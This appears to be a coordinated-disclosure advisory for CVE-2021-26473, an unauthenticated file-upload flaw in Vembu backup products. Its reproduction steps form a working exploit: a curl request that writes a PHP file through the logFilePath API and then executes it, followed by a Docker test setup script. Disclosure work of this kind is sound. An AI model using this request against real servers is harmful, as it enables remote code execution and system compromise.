CVE-2021-26473 - Unauthenticated arbitrary file upload and command execution in Vembu products
| CVE | CVE-2021-26473 |
| Case | DIVD-2020-00011 |
| Discovered by | |
| Credits |
|
| Products |
VembuBDR:
|
| Versions |
VembuBDR:
|
| Page author | Frank Breedijk |
| CVSS | Base score: 9.8 |
| References | |
| Last modified | 20 Jun 2022 09:35 |
Description
In VembuBDR before 4.2.0.1 and VembuOffsiteDR before 4.2.0.1 the http API located at /sgwebservice_o.php action logFilePath allows an attacker to write arbitrary files in the context of the web server process. These files can then be executed remotely by calling the file via the web server.
How to reproduce
Step 1:Start up a docker environment (see below)
Step 2: In a different terminal run the following command:
$ curl 'http://localhost:6060/sgwebservice_o.php?Action=logFilePath&path=./my_php_info.php&value=%3C%3Fphp%20phpinfo%28%29%20%3F%3E%0A'
<StoreGrid><Message Error="1" Message="Successfully written." Code="500" /></StoreGrid>
Step 3: validate that a file was written:
$ docker exec VembuBDR4201 /bin/bash -c "cd /home/vembubdr/Vembu/VembuBDR/htmlgui;ls -l my_*;echo ---;cat my_*;echo ---"
-rw-r--r-- 1 www-data www-data 19 Feb 11 15:35 my_php_info.php
---
<?php phpinfo() ?>
---
Call the script to get command execution:
$ curl 'http://localhost:6060/my_php_info.php'
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; color: #222; font-family: sans-serif;}
pre {margin: 0; font-family: monospace;}
a:link {color: #009; text-decoration: none; background-color: #fff;}
a:hover {text-decoration: underline;}
table {border-collapse: collapse; border: 0; width: 934px; box-shadow: 1px 2px 3px #ccc;}
.center {text-align: center;}
.center table {margin: 1em auto; text-align: left;}
.center th {text-align: center !important;}
td, th {border: 1px solid #666; font-size: 75%; vertical-align: baseline; padding: 4px 5px;}
th {position: sticky; top: 0; background: inherit;}
h1 {font-size: 150%;}
h2 {font-size: 125%;}
.p {text-align: left;}
.e {background-color: #ccf; width: 300px; font-weight: bold;}
.h {background-color: #99c; font-weight: bold;}
.v {background-color: #ddd; max-width: 300px; overflow-x: auto; word-wrap: break-word;}
.v i {color: #999;}
img {float: right; border: 0;}
hr {width: 934px; background-color: #ccc; border: 0; height: 1px;}
</style>
<title>PHP 7.4.3 - phpinfo()</title><meta name="ROBOTS" content="NOINDEX,NOFOLLOW,NOARCHIVE" /></head>
…
Impact
This vulnerability allows an attacker to upload an arbitrary file in the context of the web server and then execute it.
About the docker test environment.
In order to set up the docker test environment, we used the following script:
#!/bin/bash
# Network
if [[ $(docker network ls |grep vembu-netowrk |wc -l ) -lt 1 ]]; then
docker network create --subnet=172.18.0.0/16 vembu-network
fi
# Start Database container
mkdir DB
while [[ $(docker ps -a |grep VembuDatabase|wc -l) -ge 1 ]]; do
docker kill VembuDatabase
docker rm VembuDatabase
sleep 1
done
docker run --name VembuDatabase --network vembu-network --ip 172.18.0.2 -p 5432:5432 -d -e POSTGRES_PASSWORD=admin -e POSTGRES_USER=postgres -e POSTGRES_DB=SGDatabase -v $PWD/DB:/vembu vembubdr/bdr-latest:psql-latest
# Wait for database port to open
echo -c "Waiting for database to become available..."
while ! timeout 1 bash -c "echo > /dev/tcp/localhost/5432" ; do
echo -c "."
sleep 1;
done
echo
# Start APP container
mkdir APP
while [[ $(docker ps -a |grep VembuBDR4201|wc -l) -ge 1 ]]; do
docker kill VembuBDR4201
docker rm VembuBDR4201
sleep 1
done
docker run --name VembuBDR4201 --network vembu-network --ip 172.18.0.3 --add-host VembuDatabase:172.18.0.2 --privileged=true -i -t -d --device /dev/fuse --privileged -p 6060:6060 -p 32004:32004 -v $PWD/APP:/vembu vembubdr/bdr-latest:vembubdr-4201-u1
# Wait for app port to open
echo -c "Waiting for application to become available..."
while ! timeout 1 bash -c "echo > /dev/tcp/localhost/6060" ; do
echo -c "."
sleep 1;
done
echo
JSON version